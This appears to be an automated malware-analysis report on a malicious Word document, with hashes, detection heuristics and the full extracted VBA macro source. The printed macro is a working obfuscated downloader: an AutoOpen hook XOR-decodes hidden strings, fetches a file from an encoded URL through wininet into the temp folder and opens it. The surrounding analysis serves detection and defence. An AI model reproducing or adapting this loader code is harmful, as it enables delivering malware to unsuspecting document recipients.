Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4e07444af5611b7f…

MALICIOUS

Office (OLE)

98.5 KB Created: 2015-01-19 16:07:00 Authoring application: Microsoft Office Word First seen: 2015-04-05
MD5: a4104b20e4500bb603454616005775f5 SHA-1: 117dbc656b3bcf1688e0d83c434647a6e4f90d7f SHA-256: 4e07444af5611b7f895fa1511e7ab4109d5f0041fda494a431d8f3950b4c0c59
250 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing obfuscated VBA macros. The 'autoopen' macro and the 'CreateObject' function are used to execute code, which is typical for macro-based malware loaders. The script's primary function appears to be decoding and executing a payload, likely to download further malicious content.

Heuristics 8

  • ClamAV: Doc.Macro.GenericHeuristic-5901772-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.GenericHeuristic-5901772-2
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set FSOOO2 = CreateObject(memak8of(vjf788eS, Mcdsef42))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set FSOOO2 = CreateObject(memak8of(vjf788eS, Mcdsef42))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12427 bytes
SHA-256: c8461b50ba1fe5fe789e8188fd1a26be0dcd3b4d363f429bf94ccca188bb2ba3
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
vsvsvsaaaa110I
End Sub

Attribute VB_Name = "Module4"
Private Sub RIV3333gO()
GoTo wefwefwefweaafewf
wefwefwefweaafewf:
GoTo RERee33EGsssssgvfrgrg
RERee33EGsssssgvfrgrg:
GoTo EN299NEIKISKKKK7
EN299NEIKISKKKK7:
GoTo EN785NEIKISKKKK71
EN785NEIKISKKKK71:
GoTo ENNE435534IKISKKKK72
ENNE435534IKISKKKK72:
GoTo ULLL333LLAKhhwshefg
ULLL333LLAKhhwshefg:

End Sub
Public Function memak8of(acascasc22 As String, ghdhdhe8 As String) As String
    Dim asasas1 As Long
    Dim asasas1O As String
    Dim asasas10 As Integer
    
    Dim efefe332d As Integer
For efefe332d = 0 To 0
If efefe332d = 25 Then End
Next efefe332d
    
    Dim asasas101 As Integer

    For asasas1 = 1 To (Len(ghdhdhe8) / 2)
        asasas10 = Val("&H" & (Mid$(ghdhdhe8, (2 * asasas1) - 1, 2)))
        asasas101 = Asc(Mid$(acascasc22, ((asasas1 Mod Len(acascasc22)) + 1), 1))
        Dim dwww343a As Integer
        For dwww343a = 0 To 0
        If dwww343a = 4 Then End
        Next dwww343a
        asasas1O = asasas1O + Chr(asasas10 Xor asasas101)
         Dim efe33q299 As Integer
        For efe33q299 = 0 To 0
        If efe33q299 = 4 Then End
        Next efe33q299
    Next asasas1
   memak8of = asasas1O
End Function

Private Sub IHYbeffeVuJC()
GoTo asefawf3
asefawf3:
GoTo sgr467gfh
sgr467gfh:
GoTo d45854shfhfshf
d45854shfhfshf:
GoTo rhhrshrsth455
rhhrshrsth455:
GoTo uykoEuxdddd
uykoEuxdddd:
GoTo rVTBqKcccccArFPEEEEEyylmMVi
rVTBqKcccccArFPEEEEEyylmMVi:
GoTo IhzKeee2ascfacas2zw
IhzKeee2ascfacas2zw:
GoTo IhzKeee2svs2333zw
IhzKeee2svs2333zw:
GoTo IhzKeee223334css44zw
IhzKeee223334css44zw:

End Sub

Attribute VB_Name = "Module11"
Private Sub RIVgO()
GoTo myMuLxBcPMGZVtOntBESoqzJEi
myMuLxBcPMGZVtOntBESoqzJEi:
GoTo kDxnSccbgQJQvIHYbeuJCmUQrTZmwRfSEgCBd
kDxnSccbgQJQvIHYbeuJCmUQrTZmwRfSEgCBd:
GoTo NRsSeqnJfEwsDUkFsCaUyAhAG
NRsSeqnJfEwsDUkFsCaUyAhAG:
GoTo jstrwTahLZYosuLbSDlnHk
jstrwTahLZYosuLbSDlnHk:
GoTo zivUUwERtNsQiIuoGpMwG
zivUUwERtNsQiIuoGpMwG:
GoTo UlAHJSqlOQxDQfT
UlAHJSqlOQxDQfT:

End Sub
Private Sub vuykqyOpo()
GoTo NrVTBqKAr
NrVTBqKAr:
GoTo yylmMViKeIhzKzwqIFMQdZlBwyHfL
yylmMViKeIhzKzwqIFMQdZlBwyHfL:
GoTo msLTIokkjoZRZD
msLTIokkjoZRZD:
GoTo gjmeCgKuqfzqguEnn
gjmeCgKuqfzqguEnn:
GoTo oKQlSkVaAolfxuRnL
oKQlSkVaAolfxuRnL:

End Sub
Public Function adrMOYidGVoIc()
GoTo AzEpipThgwzCu
AzEpipThgwzCu:
GoTo bKtvPsx
bKtvPsx:
GoTo qDrdEbaBjAmqQqBvNLi
qDrdEbaBjAmqQqBvNLi:
GoTo UQctH
UQctH:
GoTo bytQYEZemcHQRPUsyF
bytQYEZemcHQRPUsyF:
GoTo wMPSKkyrcJLg
wMPSKkyrcJLg:
GoTo bYGTttUdqRmQpGhHS
bYGTttUdqRmQpGhHS:

End Function
Public Function Nk3Tflh()
GoTo irOJnpV
irOJnpV:
GoTo DsYTTRQIOVn
DsYTTRQIOVn:
GoTo dSVNmPusaOjZPeoQQ
dSVNmPusaOjZPeoQQ:
GoTo luGiChFYjYUOheBl
luGiChFYjYUOheBl:
GoTo xJabwyHfLpFms
xJabwyHfLpFms:
GoTo IokkjoZRZDePgjmeCgK
IokkjoZRZDePgjmeCgK:
GoTo fzqguEnnaM
fzqguEnnaM:

End Function
Private Function QlSkVaAo85668lfxu()

End Function
Public Function Nad121112rMOYidGVoI6c()
GoTo AzEpipThgwzCuibKtvPsxKUqDrdEbaBj
AzEpipThgwzCuibKtvPsxKUqDrdEbaBj:
GoTo qQqBvNLi
qQqBvNLi:
GoTo UQctHQbytQY
UQctHQbytQY:
GoTo GTttUdqRmQpGhHSMfNkT
GTttUdqRmQpGhHSMfNkT:
GoTo hsJZgirO
hsJZgirO:

End Function
Public Function psvssqqqqqqY()
GoTo PoePoePPP
PoePoePPP:
GoTo IokkjoKKLHHnaM
IokkjoKKLHHnaM:
GoTo QlSkVSsSMmnMxuRnLR
QlSkVSsSMmnMxuRnLR:
GoTo ssssscaaaa
ssssscaaaa:
GoTo GAAAAFFFFFc
GAAAAFFFFFc:
GoTo rA09181hgwzCuS
rA09181hgwzCuS:
GoTo KtvPs
KtvPs:

End Function
Private Function UqD34343434rdEbaBjAm()

End Function
Private Function vNLigbrgrgRH8856H()

End Function
Public Sub tQY34cHQ()

End Sub
Public Function y5000S()
GoTo cJLg6666sssssNbYGT
cJLg6666sssssNbYGT:
GoTo UdS334y5y5pGhHS
UdS334y5y5pGhHS:
GoTo NkTflaaAAa5555JZgirOJnpV
NkTflaaAAa5555JZgirOJnpV:

End Function
Public Function DsYTTRQIO()

End Function
Public Function vssvsef3wtg3gxfvx()
GoTo sdssssaas
sdssssaas:
GoTo sdvsS54738EG
sdvsS54738EG:
GoTo oZRZD44444eP
oZRZD44444eP:
GoTo meCvvvvvvgKuqf
meCvvvvvvgKuqf:

End Function





Attribute VB_Name = "Module3"
Option Explicit

#If VBA7 And Win64 Then
Private Declare PtrSafe Function figal1221 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
Private Declare PtrSafe Function lastSm23 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
Private Declare PtrSafe Function feefeROZ Lib "wininet.dll" Alias "InternetReadFile" (ByVal hFile As LongPtr, ByVal sBuff As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
Private Declare PtrSafe Function hlopa3r3 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
#Else
Private Declare Function figal1221 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
Private Declare Function lastSm23 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
Private Declare Function feefeROZ Lib "wininet.dll" Alias "InternetReadFile" (ByVal hFile As Long, ByVal sBuff As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
Private Declare Function hlopa3r3 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
#End If

Private Const MBL = 8162
Private Const AAN As String = "Mod2"
Private Const IOTD = 1
Private Const IFNCW = &H4000000
Public Function LopapunTIK1(ByVal sURL As String, ByVal sFileName As String) As Boolean
    #If VBA7 And Win64 Then
        Dim hOpen As LongPtr, hFile As LongPtr
    #Else
        Dim hOpen As Long, hFile As Long
    #End If
    Dim Ret As Long
    Dim sBuff As String * MBL, sData As String
    Dim iFile As Integer, dData As Double
    hOpen = lastSm23(AAN, IOTD, vbNullString, vbNullString, 0)
    If hOpen = 0 Then
        Exit Function
    End If
    hFile = hlopa3r3(hOpen, sURL, vbNullString, 0, IFNCW, 0)
    If hFile = 0 Then
        dData = 0
    Else
        feefeROZ hFile, sBuff, MBL, Ret
        sData = sBuff
        Do While Ret <> 0
            feefeROZ hFile, sBuff, MBL, Ret
            sData = sData + Mid(sBuff, 1, Ret)
        Loop
        dData = Len(sData): iFile = FreeFile
        Open sFileName For Binary Access Write Lock Write As #iFile
        Put #iFile, , sData: Close #iFile
    End If
    figal1221 hFile
    figal1221 hOpen
    sData = ""
    If dData Then
        LopapunTIK1 = True
    End If
End Function

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{0E025501-84C6-41E7-9746-1CA55D1B1958}{77F0D86A-FD6B-4DF8-8CBF-DEC50BAAAD80}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Module1"

Attribute VB_Name = "Module2"
Private Const GRxvSG = "300C061F0F5D2717061F0C1503370A0B0D"
Private Const jryj = "3F1E02180A1F090A4E454B131A26"
Private Const sdioph34 = "0B101703595C49171B1E040409374D00065C090049051F1D4B131A26"
Private Const Mcdsef42 = "3007111A13070F09115D231F0E26301D1007061E29051C160602"
Private Const vjf788eS = "Ccdcscsfgvsevb"






Sub vsvsvsaaaa110I()
Dim FSOOO2
Dim sder53dfbhRF As Integer
For sder53dfbhRF = 0 To 0
If sder53dfbhRF = 5 Then End
Next sder53dfbhRF
Set FSOOO2 = CreateObject(memak8of(vjf788eS, Mcdsef42))
Dim fffffF
Const fffffFID = 2
Dim DdDd22A As Integer
For DdDd22A = 0 To 0
If DdDd22A = 5 Then End
Next DdDd22A
Set fffffF = FSOOO2.GetSpecialFolder(fffffFID)
Dim Ee11 As Integer
For Ee11 = 0 To 0
If Ee11 = 5 Then End
Next Ee11
EdEdE111 = fffffF & memak8of(vjf788eS, jryj)
Dim sil3489df As Integer
For sil3489df = 0 To 0
If sil3489df = 5 Then End
Next sil3489df
Set FSObject2 = CreateObject(memak8of(vjf788eS, Mcdsef42))
Dim seswwwsa As Integer
For seswwwsa = 0 To 0
If seswwwsa = 5 Then End
Next seswwwsa
If FSObject2.FileExists(EdEdE111) Then
FSObject2.DeleteFile EdEdE111
End If
If LopapunTIK1(memak8of(vjf788eS, sdioph34), EdEdE111) Then
End If
Set SSSS = Nothing
If FSObject2.FileExists(EdEdE111) Then
End If
Set SASASA = CreateObject(memak8of(vjf788eS, GRxvSG))
SASASA.Open EdEdE111
End Sub







Attribute VB_Name = "Module5"

Public Sub PkD4040Sccbg()

End Sub
Private Sub IHYbe505VuJC()
GoTo TZmwR230fSEgCdKcNRsSeYqnJf
TZmwR230fSEgCdKcNRsSeYqnJf:
GoTo sDUk444FsCaUyA
sDUk444FsCaUyA:
GoTo GODjstrwT6904lnHkpCzivUUw
GODjstrwT6904lnHkpCzivUUw:
GoTo tNsQiIjuoGp873Tz
tNsQiIjuoGp873Tz:
GoTo uykqyO888855poEux
uykqyO888855poEux:
GoTo rVTBqKAr357FPyylmMVi
rVTBqKAr357FPyylmMVi:
GoTo IhzK4444zw
IhzK4444zw:
GoTo FdMQdZlB0258CYajGoQNTnvkPL
FdMQdZlB0258CYajGoQNTnvkPL:
GoTo PAtAfFrPpPpHKNFeHmVR
PAtAfFrPpPpHKNFeHmVR:

End Sub
Private Sub RIV1541414gO()
GoTo myMuLsaaaESoqzJEi
myMuLsaaaESoqzJEi:
GoTo kDxnScceeeeeCmUQrTZmwRfSEgCBd
kDxnScceeeeeCmUQrTZmwRfSEgCBd:
GoTo NRsSeqnaaaaaJfEwsDUkFsCaUyAhAG
NRsSeqnaaaaaJfEwsDUkFsCaUyAhAG:
GoTo jstrwT2352525ahLZYosuLbSDlnHk
jstrwT2352525ahLZYosuLbSDlnHk:
GoTo zivUUw44oGpMwG
zivUUw44oGpMwG:
GoTo UlAHJS444444qlOQxDQfT
UlAHJS444444qlOQxDQfT:

End Sub
Private Sub vuyk111111qyOpo()
GoTo NrV1010TBqKAr
NrV1010TBqKAr:
GoTo yylmMVi6464KeIhzKzwqIFMQdZlBwyHfL
yylmMVi6464KeIhzKzwqIFMQdZlBwyHfL:
GoTo msLTIok444kjoZRZD
msLTIok444kjoZRZD:
GoTo gjmeCgKu555qfzqguEnn
gjmeCgKu555qfzqguEnn:
GoTo oKQlSkVaA768olfxuRnL
oKQlSkVaA768olfxuRnL:

End Sub
Public Function adrMOY7777idGVoIc()
GoTo AzEpipThgwsdve4zCu
AzEpipThgwsdve4zCu:
GoTo bKtv4444Psx
bKtv4444Psx:
GoTo qDrdEbaBj534745674AmqQqBvNLi
qDrdEbaBj534745674AmqQqBvNLi:
GoTo UQct874H
UQct874H:
GoTo bytQYE0990099ZemcHQRPUsyF
bytQYE0990099ZemcHQRPUsyF:
GoTo wMPSKk333yrcJLg
wMPSKk333yrcJLg:
GoTo bYG23232TttUdqRmQpGhHS
bYG23232TttUdqRmQpGhHS:

End Function
Public Function Nk3121212Tflh()
GoTo irO5789JnpV
irO5789JnpV:
GoTo DsYTTR3333QIOVn
DsYTTR3333QIOVn:
GoTo dSVNmPusa565656OjZPeoQQ
dSVNmPusa565656OjZPeoQQ:
GoTo luGiChFYjYUO99999heBl
luGiChFYjYUO99999heBl:
GoTo xJabwyHfLpF66666ms
xJabwyHfLpF66666ms:
GoTo Io44kkjoZRZDePgj54meCgK
Io44kkjoZRZDePgj54meCgK:
GoTo fz343333222MMMaM
fz343333222MMMaM:

End Function
Private Function QlSkGhHHGgglfxu()

End Function
Public Function psvssEEEqqqqqqY()
GoTo PoeP001199PPP
PoeP001199PPP:
GoTo OPDK333339ja
OPDK333339ja:
GoTo JabwyU444444IOTYhFms
JabwyU444444IOTYhFms:
GoTo IokkjoKKLHH55555naM
IokkjoKKLHH55555naM:
GoTo QlSkVSsSM66666mnMxuRnLR
QlSkVSsSM66666mnMxuRnLR:
GoTo s77777sssscaaaa
s77777sssscaaaa:
GoTo GAAAAFFFFFc
GAAAAFFFFFc:
GoTo rA09181hg88888wzCuS
rA09181hg88888wzCuS:
GoTo KtvP999999s
KtvP999999s:

End Function
Private Function UqD34343000000dEbaBjAm()

End Function
Private Function vNLigbrg1010108856H()

End Function
Public Sub tQY34212121cHQ()

End Sub
Public Function y5012121200S()
GoTo cJLg666wewEEENbYGT
cJLg666wewEEENbYGT:
GoTo UdSWRRrrRRTT5y5pGhHS
UdSWRRrrRRTT5y5pGhHS:
GoTo NkTflaaAAaYyYyYyJnpV
NkTflaaAAaYyYyYyJnpV:

End Function
Public Function DsYT3332222TRQIO()

End Function
Public Function vssvs234567gxfvx()
GoTo sdsssNnNnsaas
sdsssNnNnsaas:
GoTo sdvsS5KkKk4738EG
sdvsS5KkKk4738EG:
GoTo oZRZD44UuUuUu444eP
oZRZD44UuUuUu444eP:
GoTo meCvvvvvvgKuqf
meCvvvvvvgKuqf:

End Function